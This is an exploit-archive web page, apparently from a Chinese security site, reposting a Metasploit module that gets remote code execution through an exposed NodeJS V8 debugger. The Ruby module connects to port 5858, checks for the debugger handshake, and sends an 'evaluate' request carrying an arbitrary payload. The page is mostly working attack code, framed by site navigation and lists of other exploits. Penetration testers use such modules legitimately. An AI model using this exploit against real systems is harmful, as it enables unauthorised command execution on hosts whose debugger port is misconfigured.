首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
NodeJS Debugger Command Injection
来源:metasploit.com 作者:Thomas 发布时间:2017-09-26  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  MESSAGE_HEADER_TEMPLATE   = "Content-Length: %{length}\r\n\r\n"

  def initialize(info={})
    super(update_info(info,
      'Name'           => "NodeJS Debugger Command Injection",
      'Description'    => %q{
        This module uses the "evaluate" request type of the NodeJS V8
        debugger protocol (version 1) to evaluate arbitrary JS and
         call out to other system commands. The port (default 5858) is
        not exposed non-locally in default configurations, but may be
        exposed either intentionally or via misconfiguration.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Patrick Thomas <pst[at]coffeetocode.net>' ],
      'References'     =>
        [
          [ 'URL', 'https://github.com/buggerjs/bugger-v8-client/blob/master/PROTOCOL.md' ],
          [ 'URL', 'https://github.com/nodejs/node/pull/8106' ]
        ],
      'Targets'        =>
        [
          ['NodeJS', { 'Platform' => 'nodejs', 'Arch' => 'nodejs' } ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Aug 15 2016",
      'DefaultTarget'  => 0)
    )

    register_options(
      [
        Opt::RPORT(5858)
      ])
  end

  def make_eval_message
    msg_body = { seq: 1,
                 type: 'request',
                 command: 'evaluate',
                 arguments: { expression: payload.encoded,
                              global: true,
                              maxStringLength:-1
                            }
                }.to_json
    msg_header = MESSAGE_HEADER_TEMPLATE % {:length => msg_body.length}
    msg_header + msg_body
  end

  def check
    connect
    res = sock.get_once
    disconnect

    if res.include? "V8-Version" and res.include? "Protocol-Version: 1"
      vprint_status("Got debugger handshake:\n#{res}")
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Unknown
  end

  def exploit
    connect
    # must consume incoming handshake before sending payload
    buf = sock.get_once
    msg = make_eval_message
    print_status("Sending #{msg.length} byte payload...")
    vprint_status("#{msg}")
    sock.put(msg)
    buf = sock.get_once

    if buf.include? '"command":"evaluate","success":true'
      print_status("Got success response")
    elsif buf.include? '"command":"evaluate","success":false'
      print_error("Got failure response: #{buf}")
    else
      print_error("Got unexpected response: #{buf}")
    end
  end

end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FLIR Systems FLIR Thermal Came
·Fibaro Home Center 2 - Remote
·FLIR Systems FLIR Thermal Came
·Oracle WebLogic Server 10.3.6.
·Oracle 9i XDB 9.2.0.1 - HTTP P
·LAquis SCADA 4.1.0.2385 - Dire
·Supervisor 3.0a1 - 3.3.2 - XML
·Cisco Prime Collaboration Prov
·Disk Pulse Enterprise 10.0.12
·DiskBoss Enterprise 8.4.16 - L
·CyberLink LabelPrint < 2.5 - B
·DiskBoss Enterprise 8.4.16 - '
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved